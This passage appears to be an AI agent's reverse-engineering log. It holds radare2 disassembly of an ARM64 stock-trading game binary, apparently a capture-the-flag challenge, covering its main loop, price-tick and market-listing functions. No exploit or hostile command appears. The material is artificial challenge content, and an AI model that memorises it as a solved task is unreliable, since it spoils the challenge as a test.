0x0000177c 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001780 e30f40f9 ldr x3, [var_18h] │ 0x00001784 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001788 630002eb subs x3, x3, x2 │ 0x0000178c 020080d2 mov x2, 0 │ ┌─< 0x00001790 40000054 b.eq 0x1798 │ │ 0x00001794 9ffcff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.short_sell @ 0x1790(x) │ └─> 0x00001798 e003012a mov w0, w1 │ 0x0000179c fd7b42a9 ldp x29, x30, [var_20h] │ 0x000017a0 ffc30091 add sp, sp, 0x30 ; 0x178000 └ 0x000017a4 c0035fd6 ret ; DATA XREF from entry0 @ 0xae0(r) ; DATA XREF from entry.fini0 @ 0xb90(r) ┌ 988: int main (int64_t argc); │ `- args(sp[0x30..0x30]) vars(8:sp[0x8..0x2c]) │ 0x00001aa8 ffc300d1 sub sp, sp, 0x30 │ 0x00001aac fd7b02a9 stp x29, x30, [var_20h] │ 0x00001ab0 fd830091 add x29, sp, 0x20 │ 0x00001ab4 800000b0 adrp x0, 0x12000 │ 0x00001ab8 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001abc 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001ac0 e10f00f9 str x1, [var_18h] │ 0x00001ac4 010080d2 mov x1, 0 │ 0x00001ac8 ff0f00b9 str wzr, [var_ch] │ 0x00001acc ff0700b9 str wzr, [format] │ 0x00001ad0 ff1300b9 str wzr, [var_ch] │ 0x00001ad4 800000b0 adrp x0, 0x12000 │ 0x00001ad8 009443f9 ldr x0, [x0, 0x728] ; [0x15af0:8]=0 │ ; reloc.stdin │ 0x00001adc 000040f9 ldr x0, [x0] ; [0x15af0:8]=0 │ ; reloc.stdin ; FILE*stream │ 0x00001ae0 030080d2 mov x3, 0 ; size_t size │ 0x00001ae4 42008052 mov w2, 2 │ 0x00001ae8 010080d2 mov x1, 0 ; char *buf │ 0x00001aec b9fbff97 bl sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size) │ 0x00001af0 800000b0 adrp x0, 0x12000 │ 0x00001af4 009043f9 ldr x0, [x0, 0x720] ; [0x15ae8:8]=0 │ ; reloc.stdout │ 0x00001af8 000040f9 ldr x0, [x0] ; [0x15ae8:8]=0 │ ; reloc.stdout ; FILE*stream │ 0x00001afc 030080d2 mov x3, 0 ; size_t size │ 0x00001b00 42008052 mov w2, 2 │ 0x00001b04 010080d2 mov x1, 0 ; char *buf │ 0x00001b08 b2fbff97 bl sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size) │ 0x00001b0c 01008052 mov w1, 0 │ 0x00001b10 000000b0 adrp x0, str.__Market__ ; 0x2000 │ 0x00001b14 00e00091 add x0, x0, 0x38 ; 0x2038 ; "/dev/urandom" ; const char *path │ 0x00001b18 b6fbff97 bl sym.imp.open ; int open(const char *path, int oflag) │ 0x00001b1c e01700b9 str w0, [var_14h] │ 0x00001b20 e01740b9 ldr w0, [var_14h] │ 0x00001b24 1f000071 cmp w0, 0 │ ┌─< 0x00001b28 ca000054 b.ge 0x1b40 │ │ 0x00001b2c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b30 00200191 add x0, x0, 0x48 ; 0x2048 ; "open" ; const char *s │ │ 0x00001b34 9ffbff97 bl sym.imp.perror ; void perror(const char *s) │ │ 0x00001b38 00008012 mov w0, -1 │ ┌──< 0x00001b3c c5000014 b 0x1e50 │ ││ ; CODE XREF from main @ 0x1b28(x) │ │└─> 0x00001b40 e0130091 add x0, sp, 4 ; int fildes │ │ 0x00001b44 820080d2 mov x2, 4 ; size_t nbyte │ │ 0x00001b48 e10300aa mov x1, x0 ; void *buf │ │ 0x00001b4c e01740b9 ldr w0, [var_14h] │ │ 0x00001b50 ccfbff97 bl sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte) │ │ 0x00001b54 e00740b9 ldr w0, [format] │ │ 0x00001b58 cefbff97 bl sym.imp.srand ; void srand(int seed) │ │ 0x00001b5c e01740b9 ldr w0, [var_14h] │ │ 0x00001b60 b0fbff97 bl sym.imp.close ; int close(int fildes) │ │ 0x00001b64 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b68 00400191 add x0, x0, 0x50 ; 0x2050 ; "AAPL" ; int64_t arg1 │ │ 0x00001b6c b6fcff97 bl sym.add_stock │ │ 0x00001b70 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b74 00600191 add x0, x0, 0x58 ; 0x2058 ; "GOOG" ; int64_t arg1 │ │ 0x00001b78 b3fcff97 bl sym.add_stock │ │ 0x00001b7c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b80 00800191 add x0, x0, 0x60 ; 0x2060 ; "TSLA" ; int64_t arg1 │ │ 0x00001b84 b0fcff97 bl sym.add_stock │ │ 0x00001b88 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b8c 00a00191 add x0, x0, 0x68 ; 0x2068 ; "ARMH" ; int64_t arg1 │ │ 0x00001b90 adfcff97 bl sym.add_stock │ │ 0x00001b94 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b98 00c00191 add x0, x0, 0x70 ; 0x2070 ; "NVDA" ; int64_t arg1 │ │ 0x00001b9c aafcff97 bl sym.add_stock │ │ 0x00001ba0 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001ba4 00e00191 add x0, x0, 0x78 ; 0x2078 ; "MSFT" ; int64_t arg1 │ │ 0x00001ba8 a7fcff97 bl sym.add_stock │ │ 0x00001bac 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001bb0 00000291 add x0, x0, 0x80 ; 0x2080 ; "ATVI" ; int64_t arg1 │ │ 0x00001bb4 a4fcff97 bl sym.add_stock │ │ 0x00001bb8 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001bbc 00200291 add x0, x0, 0x88 ; 0x2088 ; "CSCO" ; int64_t arg1 │ │ 0x00001bc0 a1fcff97 bl sym.add_stock │ │ 0x00001bc4 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001bc8 00400291 add x0, x0, 0x90 ; int64_t arg1 │ │ 0x00001bcc 9efcff97 bl sym.add_stock │ │ 0x00001bd0 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001bd4 00600291 add x0, x0, 0x98 ; 0x2098 ; "INTC" ; int64_t arg1 │ │ 0x00001bd8 9bfcff97 bl sym.add_stock │ │┌─< 0x00001bdc 91000014 b 0x1e20 │ ││ ; CODE XREF from main @ 0x1e30(x) │ ┌───> 0x00001be0 2cffff97 bl sym.tick │ ╎││ 0x00001be4 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001be8 00800291 add x0, x0, 0xa0 ; 0x20a0 ; "Current portfolio:" ; const char *s │ ╎││ 0x00001bec 99fbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001bf0 800000b0 adrp x0, 0x12000 │ ╎││ 0x00001bf4 00202091 add x0, x0, 0x808 ; 0x12808 │ ╎││ ; obj.money │ ╎││ 0x00001bf8 000040fd ldr d0, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ ╎││ 0x00001bfc 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001c00 00e00291 add x0, x0, 0xb8 ; 0x20b8 ; "Money: $%.2f\n" ; const char *format │ ╎││ 0x00001c04 a7fbff97 bl sym.imp.printf ; int printf(const char *format) │ ╎││ 0x00001c08 ff0b00b9 str wzr, [format] │ ┌────< 0x00001c0c 1c000014 b 0x1c7c │ │╎││ ; CODE XREF from main @ 0x1c84(x) │ ┌─────> 0x00001c10 800000f0 adrp x0, 0x14000 │ ╎│╎││ 0x00001c14 01600491 add x1, x0, 0x118 ; 0x14118 │ ╎│╎││ ; obj.user_stocks │ ╎│╎││ 0x00001c18 e00b80b9 ldrsw x0, [format] │ ╎│╎││ 0x00001c1c 00e47ad3 lsl x0, x0, 6 │ ╎│╎││ 0x00001c20 2000008b add x0, x1, x0 ; 0x14118 │ ╎│╎││ ; obj.user_stocks │ ╎│╎││ 0x00001c24 003840b9 ldr w0, [x0, 0x38] │ ╎│╎││ 0x00001c28 1f000071 cmp w0, 0 │ ┌──────< 0x00001c2c 20020054 b.eq 0x1c70 │ │╎│╎││ 0x00001c30 e00b80b9 ldrsw x0, [format] │ │╎│╎││ 0x00001c34 01e47ad3 lsl x1, x0, 6 │ │╎│╎││ 0x00001c38 800000f0 adrp x0, 0x14000 │ │╎│╎││ 0x00001c3c 00600491 add x0, x0, 0x118 ; 0x14118 │ │╎│╎││ ; obj.user_stocks │ │╎│╎││ 0x00001c40 2300008b add x3, x1, x0 ; 0x14118 │ │╎│╎││ ; obj.user_stocks │ │╎│╎││ 0x00001c44 800000f0 adrp x0, 0x14000 │ │╎│╎││ 0x00001c48 01600491 add x1, x0, 0x118 ; 0x14118 │ │╎│╎││ ; obj.user_stocks │ │╎│╎││ 0x00001c4c e00b80b9 ldrsw x0, [format] │ │╎│╎││ 0x00001c50 00e47ad3 lsl x0, x0, 6 │ │╎│╎││ 0x00001c54 2000008b add x0, x1, x0 ; 0x14118 │ │╎│╎││ ; obj.user_stocks │ │╎│╎││ 0x00001c58 003840b9 ldr w0, [x0, 0x38] │ │╎│╎││ 0x00001c5c e203002a mov w2, w0 │ │╎│╎││ 0x00001c60 e10303aa mov x1, x3 │ │╎│╎││ 0x00001c64 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │╎│╎││ 0x00001c68 00200391 add x0, x0, 0xc8 ; 0x20c8 ; "%s: %d shares\n" ; const char *format │ │╎│╎││ 0x00001c6c 8dfbff97 bl sym.imp.printf ; int printf(const char *format) │ │╎│╎││ ; CODE XREF from main @ 0x1c2c(x) │ └──────> 0x00001c70 e00b40b9 ldr w0, [format] │ ╎│╎││ 0x00001c74 00040011 add w0, w0, 1 │ ╎│╎││ 0x00001c78 e00b00b9 str w0, [format] │ ╎│╎││ ; CODE XREF from main @ 0x1c0c(x) │ ╎└────> 0x00001c7c e00b40b9 ldr w0, [format] │ ╎ ╎││ 0x00001c80 1f8c0171 cmp w0, 0x63 ; 'c' │ └─────< 0x00001c84 6dfcff54 b.le 0x1c10 │ ╎││ 0x00001c88 a0000090 adrp x0, 0x15000 │ ╎││ 0x00001c8c 00802891 add x0, x0, sym.imp.close ; 0xa20 │ ╎││ 0x00001c90 000040fd ldr d0, [x0] ; [0x15a20:8]=0 │ ╎││ ; obj.shorting_capacity │ ╎││ 0x00001c94 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001c98 00600391 add x0, x0, 0xd8 ; 0x20d8 ; "Shorting Capacity: $%.2f\n" ; const char *format │ ╎││ 0x00001c9c 81fbff97 bl sym.imp.printf ; int printf(const char *format) │ ╎││ 0x00001ca0 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001ca4 00e00391 add x0, x0, 0xf8 ; 0x20f8 ; "What would you like to do?" ; const char *s │ ╎││ 0x00001ca8 6afbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cac 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cb0 00600491 add x0, x0, 0x118 ; 0x2118 ; "1. Buy stock." ; const char *s │ ╎││ 0x00001cb4 67fbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cb8 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cbc 00a00491 add x0, x0, 0x128 ; 0x2128 ; "2. Sell stock." ; const char *s │ ╎││ 0x00001cc0 64fbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cc4 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cc8 00e00491 add x0, x0, 0x138 ; 0x2138 ; "3. Check stock price." ; const char *s │ ╎││ 0x00001ccc 61fbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cd0 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cd4 00400591 add x0, x0, 0x150 ; 0x2150 ; "4. Short sell stock." ; const char *s │ ╎││ 0x00001cd8 5efbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cdc 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001ce0 00a00591 add x0, x0, 0x168 ; 0x2168 ; "5. Consult market." ; const char *s │ ╎││ 0x00001ce4 5bfbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001ce8 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cec 00000691 add x0, x0, 0x180 ; 0x2180 ; "Enter your choice:" ; const char *format │ ╎││ 0x00001cf0 6cfbff97 bl sym.imp.printf ; int printf(const char *format) │ ╎││ 0x00001cf4 f6fbff97 bl sym.read_int │ ╎││ 0x00001cf8 e01300b9 str w0, [var_ch] │ ╎││ 0x00001cfc e01340b9 ldr w0, [var_ch] │ ╎││ 0x00001d00 1f140071 cmp w0, 5 │ ┌────< 0x00001d04 40070054 b.eq 0x1dec │ │╎││ 0x00001d08 e01340b9 ldr w0, [var_ch] │ │╎││ 0x00001d0c 1f140071 cmp w0, 5 │ ┌─────< 0x00001d10 2c070054 b.gt 0x1df4 │ ││╎││ 0x00001d14 e01340b9 ldr w0, [var_ch] │ ││╎││ 0x00001d18 1f100071 cmp w0, 4 │ ┌──────< 0x00001d1c 20050054 b.eq 0x1dc0 │ │││╎││ 0x00001d20 e01340b9 ldr w0, [var_ch] │ │││╎││ 0x00001d24 1f100071 cmp w0, 4 │ ┌───────< 0x00001d28 6c060054 b.gt 0x1df4 │ ││││╎││ 0x00001d2c e01340b9 ldr w0, [var_ch] │ ││││╎││ 0x00001d30 1f0c0071 cmp w0, 3 │ ────────< 0x00001d34 20040054 b.eq 0x1db8 │ ││││╎││ 0x00001d38 e01340b9 ldr w0, [var_ch] │ ││││╎││ 0x00001d3c 1f0c0071 cmp w0, 3 │ ────────< 0x00001d40 ac050054 b.gt 0x1df4 │ ││││╎││ 0x00001d44 e01340b9 ldr w0, [var_ch] │ ││││╎││ 0x00001d48 1f040071 cmp w0, 1 │ ────────< 0x00001d4c a0000054 b.eq 0x1d60 │ ││││╎││ 0x00001d50 e01340b9 ldr w0, [var_ch] │ ││││╎││ 0x00001d54 1f080071 cmp w0, 2 │ ───���────< 0x00001d58 a0010054 b.eq 0x1d8c │ ────────< 0x00001d5c 26000014 b 0x1df4 │ ││││╎││ ; CODE XREF from main @ 0x1d4c(x) │ ────────> 0x00001d60 0efdff97 bl sym.buy_stock │ ││││╎││ 0x00001d64 1f000071 cmp w0, 0 │ ────────< 0x00001d68 a1000054 b.ne 0x1d7c │ ││││╎││ 0x00001d6c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001d70 00600691 add x0, x0, 0x198 ; 0x2198 ; "Transaction successful." ; const char *s │ ││││╎││ 0x00001d74 37fbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001d78 23000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d68(x) │ ────────> 0x00001d7c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001d80 00c00691 add x0, x0, 0x1b0 ; 0x21b0 ; "Transaction failed." ; const char *s │ ││││╎││ 0x00001d84 33fbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001d88 1f000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d58(x) │ ────────> 0x00001d8c 88fdff97 bl sym.sell_stock │ ││││╎││ 0x00001d90 1f000071 cmp w0, 0 │ ────────< 0x00001d94 a1000054 b.ne 0x1da8 │ ││││╎││ 0x00001d98 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001d9c 00600691 add x0, x0, 0x198 ; 0x2198 ; "Transaction successful." ; const char *s │ ││││╎││ 0x00001da0 2cfbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001da4 18000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d94(x) │ ────────> 0x00001da8 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001dac 00c00691 add x0, x0, 0x1b0 ; 0x21b0 ; "Transaction failed." ; const char *s │ ││││╎││ 0x00001db0 28fbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001db4 14000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d34(x) │ ────────> 0x00001db8 7cfeff97 bl sym.check_stock_price │ ────────< 0x00001dbc 12000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d1c(x) │ │└──────> 0x00001dc0 f3fdff97 bl sym.short_sell │ │ ││╎││ 0x00001dc4 1f000071 cmp w0, 0 │ │┌──────< 0x00001dc8 a1000054 b.ne 0x1ddc │ ││││╎││ 0x00001dcc 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001dd0 00600691 add x0, x0, 0x198 ; 0x2198 ; "Transaction successful." ; const char *s │ ││││╎││ 0x00001dd4 1ffbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001dd8 0b000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1dc8(x) │ │└──────> 0x00001ddc 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ ││╎││ 0x00001de0 00c00691 add x0, x0, 0x1b0 ; 0x21b0 ; "Transaction failed." ; const char *s │ │ ││╎││ 0x00001de4 1bfbff97 bl sym.imp.puts ; int puts(const char *s) │ │┌──────< 0x00001de8 07000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d04(x) │ │││└────> 0x00001dec f0feff97 bl sym.consult_market │ │││┌────< 0x00001df0 05000014 b 0x1e04 │ ││││╎││ ; CODE XREFS from main @ 0x1d10(x), 0x1d28(x), 0x1d40(x), 0x1d5c(x) │ └─└─────> 0x00001df4 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ │╎││ 0x00001df8 00200791 add x0, x0, 0x1c8 ; 0x21c8 ; "Invalid choice." ; const char *s │ │ │╎││ 0x00001dfc 15fbff97 bl sym.imp.puts ; int puts(const char *s) │ │ │╎││ 0x00001e00 1f2003d5 nop │ │ │╎││ ; XREFS: CODE 0x00001d78 CODE 0x00001d88 CODE 0x00001da4 │ │ │╎││ ; XREFS: CODE 0x00001db4 CODE 0x00001dbc CODE 0x00001dd8 │ │ │╎││ ; XREFS: CODE 0x00001de8 CODE 0x00001df0 │ ─└─└────> 0x00001e04 a0000090 adrp x0, 0x15000 │ ╎││ 0x00001e08 00a02891 add x0, x0, 0xa28 ; 0x15a28 │ ╎││ ; obj.trades │ ╎││ 0x00001e0c 000040b9 ldr w0, [x0] ; [0x15a28:8]=0 │ ╎││ ; obj.trades │ ╎││ 0x00001e10 01040011 add w1, w0, 1 │ ╎││ 0x00001e14 a0000090 adrp x0, 0x15000 │ ╎││ 0x00001e18 00a02891 add x0, x0, 0xa28 ; 0x15a28 │ ╎││ ; obj.trades │ ╎││ 0x00001e1c 010000b9 str w1, [x0] ; 0x15a28 │ ╎││ ; obj.trades │ ╎││ ; CODE XREF from main @ 0x1bdc(x) │ ╎│└─> 0x00001e20 a0000090 adrp x0, 0x15000 │ ╎│ 0x00001e24 00a02891 add x0, x0, 0xa28 ; 0x15a28 │ ╎│ ; obj.trades │ ╎│ 0x00001e28 000040b9 ldr w0, [x0] ; [0x15a28:8]=0 │ ╎│ ; obj.trades │ ╎│ 0x00001e2c 1f8c0171 cmp w0, 0x63 ; 'c' │ └───< 0x00001e30 89edff54 b.ls 0x1be0 │ │ 0x00001e34 800000b0 adrp x0, 0x12000 │ │ 0x00001e38 00202091 add x0, x0, 0x808 ; 0x12808 │ │ ; obj.money │ │ 0x00001e3c 000040fd ldr d0, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ │ 0x00001e40 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001e44 00600791 add x0, x0, 0x1d8 ; 0x21d8 ; "Final amount of money: %.2f\n" ; const char *format │ │ 0x00001e48 16fbff97 bl sym.imp.printf ; int printf(const char *format) │ │ 0x00001e4c 00008052 mov w0, 0 │ │ ; CODE XREF from main @ 0x1b3c(x) │ └──> 0x00001e50 e103002a mov w1, w0 │ 0x00001e54 800000b0 adrp x0, 0x12000 │ 0x00001e58 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001e5c e30f40f9 ldr x3, [var_18h] │ 0x00001e60 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001e64 630002eb subs x3, x3, x2 │ 0x00001e68 020080d2 mov x2, 0 │ ┌─< 0x00001e6c 40000054 b.eq 0x1e74 │ │ 0x00001e70 e8faff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from main @ 0x1e6c(x) │ └─> 0x00001e74 e003012a mov w0, w1 │ 0x00001e78 fd7b42a9 ldp x29, x30, [var_20h] │ 0x00001e7c ffc30091 add sp, sp, 0x30 ; 0x178000 └ 0x00001e80 c0035fd6 ret - **Assistant:** INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 ; CALL XREF from main @ 0x1be0(x) ┌ 284: sym.tick (int64_t arg_30h); │ `- args() vars(5:sp[0x8..0x24]) │ 0x00001890 ffc300d1 sub sp, sp, 0x30 │ 0x00001894 fd7b02a9 stp x29, x30, [var_20h] │ 0x00001898 fd830091 add x29, sp, 0x20 │ 0x0000189c 800000b0 adrp x0, 0x12000 │ 0x000018a0 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000018a4 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000018a8 e10f00f9 str x1, [var_18h] │ 0x000018ac 010080d2 mov x1, 0 │ 0x000018b0 800000b0 adrp x0, 0x12000 │ 0x000018b4 00202091 add x0, x0, 0x808 ; 0x12808 │ ; obj.money │ 0x000018b8 000040fd ldr d0, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ 0x000018bc 0000c8d2 mov x0, 0x400000000000 │ 0x000018c0 e011e8f2 movk x0, 0x408f, lsl 48 │ 0x000018c4 0100679e fmov d1, x0 │ 0x000018c8 0018611e fdiv d0, d0, d1 │ 0x000018cc a0000090 adrp x0, 0x15000 │ 0x000018d0 00802891 add x0, x0, sym.imp.close ; 0xa20 │ 0x000018d4 000000fd str d0, [x0] ; 0x15a20 │ ; obj.shorting_capacity │ 0x000018d8 ff0f00b9 str wzr, [var_ch] │ ┌─< 0x000018dc 22000014 b 0x1964 │ │ ; CODE XREF from sym.tick @ 0x1978(x) │ ┌──> 0x000018e0 ff0b00f9 str xzr, [var_10h] │ ╎│ 0x000018e4 47fcff97 bl sym.imp.rand ; int rand(void) │ ╎│ 0x000018e8 00000012 and w0, w0, 1 │ ╎│ 0x000018ec 1f000071 cmp w0, 0 │ ┌───< 0x000018f0 e0000054 b.eq 0x190c │ │╎│ 0x000018f4 200fe8d2 mov x0, 0x4079000000000000 ; int64_t arg_30h │ │╎│ 0x000018f8 0100679e fmov d1, x0 │ │╎│ 0x000018fc 0090741e fmov d0, -10 │ │╎│ 0x00001900 30fdff97 bl sym.drand │ │╎│ 0x00001904 e00b00fd str d0, [var_10h] │ ┌────< 0x00001908 06000014 b 0x1920 │ ││╎│ ; CODE XREF from sym.tick @ 0x18f0(x) │ │└───> 0x0000190c 0190641e fmov d1, 10 │ │ ╎│ 0x00001910 200bf8d2 mov x0, -0x3fa7000000000000 ; int64_t arg_30h │ │ ╎│ 0x00001914 0000679e fmov d0, x0 │ │ ╎│ 0x00001918 2afdff97 bl sym.drand │ │ ╎│ 0x0000191c e00b00fd str d0, [var_10h] │ │ ╎│ ; CODE XREF from sym.tick @ 0x1908(x) │ └────> 0x00001920 800000b0 adrp x0, 0x12000 │ ╎│ 0x00001924 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x00001928 e00f80b9 ldrsw x0, [var_ch] │ ╎│ 0x0000192c 00e47ad3 lsl x0, x0, 6 │ ╎│ 0x00001930 2000008b add x0, x1, x0 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x00001934 011840fd ldr d1, [x0, 0x30] │ ╎│ 0x00001938 e00b40fd ldr d0, [var_10h] │ ╎│ 0x0000193c 2028601e fadd d0, d1, d0 │ ╎│ 0x00001940 800000b0 adrp x0, 0x12000 │ ╎│ 0x00001944 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x00001948 e00f80b9 ldrsw x0, [var_ch] │ ╎│ 0x0000194c 00e47ad3 lsl x0, x0, 6 │ ╎│ 0x00001950 2000008b add x0, x1, x0 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x00001954 001800fd str d0, [x0, 0x30] │ ╎│ 0x00001958 e00f40b9 ldr w0, [var_ch] │ ╎│ 0x0000195c 00040011 add w0, w0, 1 │ ╎│ 0x00001960 e00f00b9 str w0, [var_ch] │ ╎│ ; CODE XREF from sym.tick @ 0x18dc(x) │ ╎└─> 0x00001964 e10f40b9 ldr w1, [var_ch] │ ╎ 0x00001968 a0000090 adrp x0, 0x15000 │ ╎ 0x0000196c 00602891 add x0, x0, 0xa18 ; 0x15a18 │ ╎ ; obj.num_stocks │ ╎ 0x00001970 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ ╎ ; obj.num_stocks │ ╎ 0x00001974 3f00006b cmp w1, w0 │ └──< 0x00001978 43fbff54 b.lo 0x18e0 │ 0x0000197c 1f2003d5 nop │ 0x00001980 800000b0 adrp x0, 0x12000 │ 0x00001984 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001988 e20f40f9 ldr x2, [var_18h] │ 0x0000198c 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001990 420001eb subs x2, x2, x1 │ 0x00001994 010080d2 mov x1, 0 │ ┌─< 0x00001998 40000054 b.eq 0x19a0 │ │ 0x0000199c 1dfcff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.tick @ 0x1998(x) │ └─> 0x000019a0 fd7b42a9 ldp x29, x30, [var_20h] │ 0x000019a4 ffc30091 add sp, sp, 0x30 ; 0x178000 └ 0x000019a8 c0035fd6 ret - **Assistant:** INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 ; CALL XREF from main @ 0x1dec(x) ┌ 252: sym.consult_market (int64_t arg_20h); │ `- args() vars(4:sp[0x8..0x1c]) │ 0x000019ac ff8300d1 sub sp, sp, 0x20 │ 0x000019b0 fd7b01a9 stp x29, x30, [var_10h] │ 0x000019b4 fd430091 add x29, sp, 0x10 │ 0x000019b8 800000b0 adrp x0, 0x12000 │ 0x000019bc 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000019c0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000019c4 e10700f9 str x1, [var_8h] │ 0x000019c8 010080d2 mov x1, 0 │ 0x000019cc 000000b0 adrp x0, str.__Market__ ; 0x2000 │ 0x000019d0 00000091 add x0, x0, 0 ; 0x2000 ; "- Market -" ; const char *s │ 0x000019d4 1ffcff97 bl sym.imp.puts ; int puts(const char *s) │ 0x000019d8 ff0700b9 str wzr, [format] │ ┌─< 0x000019dc 21000014 b 0x1a60 │ │ ; CODE XREF from sym.consult_market @ 0x1a68(x) │ ┌──> 0x000019e0 800000b0 adrp x0, 0x12000 │ ╎│ 0x000019e4 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x000019e8 e00780b9 ldrsw x0, [format] │ ╎│ 0x000019ec 00e47ad3 lsl x0, x0, 6 │ ╎│ 0x000019f0 2000008b add x0, x1, x0 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x000019f4 003840b9 ldr w0, [x0, 0x38] │ ╎│ 0x000019f8 1f000071 cmp w0, 0 │ ┌───< 0x000019fc c0020054 b.eq 0x1a54 │ │╎│ 0x00001a00 e00780b9 ldrsw x0, [format] │ │╎│ 0x00001a04 01e47ad3 lsl x1, x0, 6 │ │╎│ 0x00001a08 800000b0 adrp x0, 0x12000 │ │╎│ 0x00001a0c 00602091 add x0, x0, 0x818 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a10 2200008b add x2, x1, x0 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a14 800000b0 adrp x0, 0x12000 │ 